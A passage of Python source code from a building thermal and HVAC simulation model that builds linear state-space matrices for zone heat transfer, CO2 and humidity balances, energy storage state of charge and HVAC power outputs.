)
# Heat transfer between radiator hull front and zone air.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacity']
)
if zone_data.at['radiator_panel_number'] == '2':
# Heat transfer between radiator panel 1 hull rear and zone air.
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator panel 2 hull front and zone air.
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator hull rear and zone air.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator hull front / rear and zone surfaces.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
/ zone_data.at['heat_capacitance_hull']
)
for surface_name, surface_data in (
pd.concat(
[
building_data.surfaces_exterior.loc[
building_data.surfaces_exterior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_adjacent_name'].isin([zone_name]),
:
],
building_data.surfaces_adiabatic.loc[
building_data.surfaces_adiabatic['zone_name'].isin([zone_name]),
:
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone.
):
# Front.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{surface_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
# Rear.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{surface_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
def define_heat_transfer_hvac_ahu():
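            # Linearized AHU heat gain into the zone air (explanatory note; variable
            # roles inferred from the unit-conversion comments below): assuming the
            # control variable is the supply air flow per zone area in l/s per m²,
            #   dT_zone/dt += (flow / 1000 * zone_area) * c_air * (T_supply - T_lin) / C_zone
            # where c_air = `heat_capacity_air` is taken as volumetric [J/(m³·K)] and
            # C_zone = `heat_capacity` is the zone air heat capacity [J/K].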
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_ahu_heat_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['ahu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_heat']
)
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_ahu_cool_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['ahu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_cool']
)
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_tu():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_tu_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_tu_heat_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['tu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_heat']
)
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_tu_cool_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['tu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_cool']
)
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_vent():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_vent_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
building_data.scenarios.at['linearization_ambient_air_temperature']
- building_data.scenarios.at['linearization_zone_air_temperature']
)
/ zone_data.at['heat_capacity']
)
def define_co2_transfer():
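            # Zone CO2 balance, linearized around the scenario operating point
            # (explanatory note; a sketch of the model below, not additional logic):
            #   dc/dt = occupancy_co2_gain * occupancy / zone_volume
            #           - (fresh air flow / zone_volume) * c
            # Fresh air enters via AHU / ventilation flows (l/s per m² of zone area,
            # hence the / 1000 * zone_area conversions) and infiltration (air changes
            # per hour, hence / 3600). The bilinear product flow * c is linearized,
            # which yields the constant-disturbance correction terms.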
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['fresh_air_flow_control_type'] == 'co2_based':
state_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_co2_concentration'
] += (
- 1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ zone_data.at['zone_volume']
)
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_ahu_heat_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_ahu_cool_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_vent_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
disturbance_matrix[
f'{zone_name}_co2_concentration',
'constant'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
)
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_co2_concentration',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
1.0
* zone_data.at['occupancy_density']
* zone_data.at['occupancy_co2_gain']
/ zone_data.at['zone_volume']
)
disturbance_matrix[
f'{zone_name}_co2_concentration',
'constant'
] += (
1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
def define_humidity_transfer():
# TODO: Change absolute humidity unit from kg/kg to g/kg for numerical performance.
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['humidity_control_type'] == 'humidity_based':
state_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_absolute_humidity'
] += (
- 1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_ahu_heat_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
/ zone_data.at['zone_air_mass']
)
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_ahu_cool_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_vent_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
/ zone_data.at['zone_air_mass']
)
disturbance_matrix[
f'{zone_name}_absolute_humidity',
'constant'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_absolute_humidity',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
1.0
* zone_data.at['occupancy_density']
* zone_data.at['occupancy_humidity_gain']
/ 1000 # kg in g.
/ zone_data.at['zone_air_mass']
)
disturbance_matrix[
f'{zone_name}_absolute_humidity',
'constant'
] += (
1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* building_data.scenarios.at['linearization_zone_air_absolute_humidity']
/ zone_data.at['zone_height']
)
def define_storage_state_of_charge():
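            # Explanatory note: state of charge is tracked in % of usable capacity.
            # Sensible thermal storage capacity [m³] is converted to energy via water
            # density * specific heat * temperature delta; battery capacity is
            # converted from kWh to Ws and derated by the depth of discharge. Charging
            # is scaled by the round-trip efficiency, discharging is not, i.e. losses
            # are booked on the charge side.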
# Sensible storage cooling.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_thermal_power_cooling'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_thermal_power_cooling'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Sensible storage heating.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_thermal_power_heating'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_thermal_power_heating'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Battery storage.
if building_data.scenarios.at['storage_commodity_type'] == 'battery':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_electric_power'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ 3600 / 1000 # kWh in Ws.
/ building_data.scenarios.at['storage_battery_depth_of_discharge']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_electric_power'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ 3600 / 1000 # kWh in Ws.
/ building_data.scenarios.at['storage_battery_depth_of_discharge']
)
# Storage losses.
if pd.notnull(building_data.scenarios.at['storage_type']):
state_matrix[
'storage_state_of_charge',
'storage_state_of_charge'
] += (
- 1.0
* building_data.scenarios.at['storage_self_discharge_rate']
/ 3600 # %/h in %/s.
)
def define_output_zone_temperature():
for zone_name, zone_data in building_data.zones.iterrows():
state_output_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] = 1.0
def define_output_zone_co2_concentration():
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['fresh_air_flow_control_type'] == 'co2_based':
state_output_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_co2_concentration'
] = 1.0
def define_output_zone_humidity():
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['humidity_control_type'] == 'humidity_based':
state_output_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_absolute_humidity'
] = 1.0
def define_output_internal_gain_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['internal_gain_type']):
# Electric power due to appliances.
disturbance_output_matrix[
'electric_power_balance',
zone_data.at['internal_gain_type'] + '_internal_gain_appliances'
] += (
1.0
* zone_data.at['appliances_heat_gain']
* zone_data.at['zone_area']
/ self.zone_area_total
)
# Thermal power heating due to warm water demand.
if pd.notnull(zone_data.at['warm_water_demand_thermal_power']):
disturbance_output_matrix[
'thermal_power_heating_balance',
zone_data.at['internal_gain_type'] + '_warm_water_demand'
] += (
1.0
* zone_data.at['warm_water_demand_thermal_power']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_generic():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_generic_type']):
# Cooling power.
control_output_matrix[
f'{zone_name}_generic_cool_thermal_power',
f'{zone_name}_generic_cool_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_generic_cool_thermal_power'
] = (
1.0
/ zone_data.at['generic_cooling_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
# Heating power.
control_output_matrix[
f'{zone_name}_generic_heat_thermal_power',
f'{zone_name}_generic_heat_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_generic_heat_thermal_power'
] = (
1.0
/ zone_data.at['generic_heating_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_radiator_power():
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Heating power (radiators do not require cooling power).
control_output_matrix[
f'{zone_name}_radiator_thermal_power',
f'{zone_name}_radiator_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_radiator_thermal_power'
] = (
1.0
/ zone_data.at['radiator_heating_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_ahu_power():
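            # Explanatory note on the enthalpy branches below: if the ambient absolute
            # humidity is at or below the supply setpoint humidity, no dehumidification
            # is needed, so cooling / heating are purely sensible and heat recovery can
            # offset either. Otherwise the air is assumed to be cooled to the supply
            # dew point (latent + sensible), then reheated to the supply temperature
            # setpoint, and heat recovery only offsets the cooling side
            # (delta_enthalpy_ahu_recovery_heating = 0.0).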
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
# Obtain parameters.
ahu_supply_air_absolute_humidity_setpoint = (
cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
delta_enthalpy_ahu_recovery = (
cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
)
)
# Obtain enthalpies.
if (
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
<= ahu_supply_air_absolute_humidity_setpoint
):
delta_enthalpy_ahu_cooling = min(
0.0,
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_heating = max(
0.0,
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_recovery_cooling = max(
delta_enthalpy_ahu_cooling,
min(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
delta_enthalpy_ahu_recovery_heating = min(
delta_enthalpy_ahu_heating,
max(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
else:
delta_enthalpy_ahu_cooling = (
cobmo.utils.calculate_dew_point_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_heating = (
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
ahu_supply_air_absolute_humidity_setpoint
)
- cobmo.utils.calculate_dew_point_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
delta_enthalpy_ahu_recovery_cooling = max(
delta_enthalpy_ahu_cooling,
min(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
delta_enthalpy_ahu_recovery_heating = 0.0
# Air flow.
control_output_matrix[
f'{zone_name}_ahu_cool_air_flow',
f'{zone_name}_ahu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_ahu_heat_air_flow',
f'{zone_name}_ahu_heat_air_flow'
] = 1.0
# Cooling power.
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_cooling)
- abs(delta_enthalpy_ahu_recovery_cooling)
)
/ zone_data.at['ahu_cooling_efficiency']
)
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_cooling)
- abs(delta_enthalpy_ahu_recovery_cooling)
)
/ zone_data.at['ahu_cooling_efficiency']
)
# Heating power.
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_heating)
- abs(delta_enthalpy_ahu_recovery_heating)
)
/ zone_data.at['ahu_heating_efficiency']
)
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_heating)
- abs(delta_enthalpy_ahu_recovery_heating)
)
/ zone_data.at['ahu_heating_efficiency']
)
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['ahu_fan_efficiency']
)
control_output_matrix[
'electric_power_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['ahu_fan_efficiency']
)
def define_output_hvac_tu_power():
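            # Explanatory note: the enthalpy difference across the terminal unit (TU)
            # depends on its air intake. With 'zone' intake, the reference temperature
            # is the linearized zone air temperature (separate heating / cooling
            # points); with 'ahu' intake, it is the AHU supply air temperature
            # setpoint.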
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_tu_type']):
# Calculate enthalpies.
if zone_data.at['tu_air_intake_type'] == 'zone':
delta_enthalpy_tu_cooling = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['linearization_zone_air_temperature_cool']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
delta_enthalpy_tu_heating = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['linearization_zone_air_temperature_heat']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
elif zone_data.at['tu_air_intake_type'] == 'ahu':
delta_enthalpy_tu_cooling = building_data.parameters.at['heat_capacity_air'] * (
                            zone_data.at['ahu_supply_air_temperature_setpoint']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
delta_enthalpy_tu_heating = building_data.parameters.at['heat_capacity_air'] * (
                            zone_data.at['ahu_supply_air_temperature_setpoint']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
else:
                        logger.error(f"Unknown `tu_air_intake_type`: {zone_data.at['tu_air_intake_type']}")
raise ValueError
# Air flow.
control_output_matrix[
f'{zone_name}_tu_cool_air_flow',
f'{zone_name}_tu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_tu_heat_air_flow',
f'{zone_name}_tu_heat_air_flow'
] = 1.0
# Cooling power.
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_tu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* abs(delta_enthalpy_tu_cooling)
/ zone_data.at['tu_cooling_efficiency']
)
# Heating power.
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_tu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* abs(delta_enthalpy_tu_heating)
/ zone_data.at['tu_heating_efficiency']
)
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_tu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['tu_fan_efficiency']
)
control_output_matrix[
'electric_power_balance',
f'{zone_name}_tu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['tu_fan_efficiency']
)
def define_output_hvac_vent_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_vent_type']):
# Air flow.
control_output_matrix[
f'{zone_name}_vent_air_flow',
f'{zone_name}_vent_air_flow'
] = 1.0
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_vent_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['vent_fan_efficiency']
)
def define_output_fresh_air_flow():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_ahu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_ahu_heat_air_flow'
] = 1.0
if pd.notnull(zone_data.at['hvac_vent_type']):
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_vent_air_flow'
] = 1.0
disturbance_output_matrix[
f'{zone_name}_total_fresh_air_flow',
'constant'
] += (
zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* 1000 # m³ in l.
/ zone_data.at['zone_area']
)
def define_output_storage_state_of_charge():
if pd.notnull(building_data.scenarios.at['storage_type']):
state_output_matrix[
'storage_state_of_charge',
'storage_state_of_charge'
] = 1.0
def define_output_storage_power():
# Sensible storage cooling.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling':
control_output_matrix[
'thermal_power_cooling_balance',
'storage_charge_thermal_power_cooling'
] = 1.0
control_output_matrix[
